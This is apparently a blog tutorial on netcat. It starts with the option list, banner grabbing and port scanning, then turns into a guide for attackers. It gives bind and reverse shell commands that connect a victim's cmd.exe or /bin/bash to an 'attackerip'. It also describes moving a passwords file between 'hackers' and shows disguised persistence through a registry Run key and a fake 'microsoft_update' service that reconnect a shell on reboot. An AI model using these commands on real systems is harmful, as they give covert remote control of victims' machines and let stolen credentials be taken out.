Power of netcat

0

Netcat actually is not a hacking tool. It is a networking tool. We can use it to communicate with other computers remotely, transferring data,Chatting etc. But We can also use it as Backdoor or hacking tool, For example “ping” is not hacking or DoS tool but we can DoS using “Ping” …no? So we can’t call it DDOSER tool.

 Anyway, Often netcat is called as “Swiss Army Knife” 

I will explain the basic usage of it now


All option in netcat:

nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] …
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e’; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, …
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp-data’).

We can use netcat as backdoor, banner grabbing, port scanning, chatting, file transfer, traffic redirection etc.

Banner Grabbing :

root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
 sent 16, rcvd 617

How: nc -vvv ip port . Then Hit enter twice.

Simply we see The version of Web server is Apache 2.2.21 (Wind32) . Not only that , We can see OpenSSL version, PHP version etc. Do you know how a scanner scan for vulnerability against a target? The Scanner first find the version of server/application, then check on the local database(For example nessus,acunetix etc). We also can start Google search vulnerability for specific version …. no?

The same way we can find other application version, information:

 root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.

 
You can try to connect to any port excluding 443 since netcat can’t communicate over ssl. Or do the tunneling.

Chat with your Hacker friend:

Suppose there are two hacker called hacker1 and hacker2. They don’t want to get caught for using other messenger, or they just do private communication.

How they are doing this ? Simple command :

hacker1(Netcat listening):

nc -vvv -l -p 44444

-vvv stand for verbose(as much as possible)

-l for listening(Opening the port to connect)

-p for port(any specific port to connect)

hacker2(Connecting to hacker1):

nc -vvv 192.168.96.129 4444   (4444 is the port)

hacker1

                                                                            hacker2

Transfer the File:

Hackers do not want to transfer the file via public file sharing server because of risk. But they can use netcat for transfer the file .

Suppose hacker1(Blackhat) has some passwords file on his computer ( 192.168.96.129) and want to transfer the file to hacker2( 192.168.1.213).

Hacker1 netcat command was:

nc -vvv -l -p 4444 <passwords.txt

hacker2 netcat command was:

nc -vvv 192.168.96.129 >passwords.txt

             
Let’s do a port scan using netcat:

we can scan port with simple command nc -vvv targetip 1-65535

or

 nc -vvv -z targetip 1-65535

  Here  extra “-z” option use Input output method.

simple to create a backdoor using netcat:

windows server mode:

nc -L -p 1337 -e cmd.exe

-L don’t die.
-e start command line.

Linux/Unix server mode:

nc -l -p 1337 -k -e /bin/bash

-k don’t die
-e command mode.

Connect to the server:

nc -vv targetip 1337

How about Reverse connection? Try the following on victim machin:

nc -e cmd -d attackerip  1337

On your  own computer(Attacker):

nc -vv -l -k -p 1337

Now you are thinking that how hacker can install the netcat on victim computer… right? ..

1. They first compromise the target system/server. And they want permanent access to the victim machine. So only way is uploading backdoor, setting it as start up application.                                                                                    
2. They create a batch file or shell script or downloader. Then sends it to the victim(Undetected by AV). Whenever the victim click on the script/batch it start downloading, installing etc automatically.

So how you make the netcat as stealth backdoor? Answer is by editing registry or moving to startup folder. Suppose you compromised an IIS web server and uploaded cmdasp.asp backdoor. Now you want to install the netcat as a stealth backdoor for some reason().

Netcat as start up backdoor:

Run this command:

reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v microsoft_service /t REG_SZ /d “c:nc.exe -d targetip 1337 -e cmd.exe”

Create a netcat listener on your local computer . Whenever the victim reboot his computer, he will get connected to you.

How about netcat as services ? try:

sc create microsoft_update binpath=”cmd /K start c:nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore 

Now try to make the backdoor to connect to you (hint: at).

By the way, you can do much more with netcat . netcat is not so bad as a backoor and if you can edit the C code netcat then it can be a supper backdoor. 
Try more….

More about it:

www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139  (Download for windows)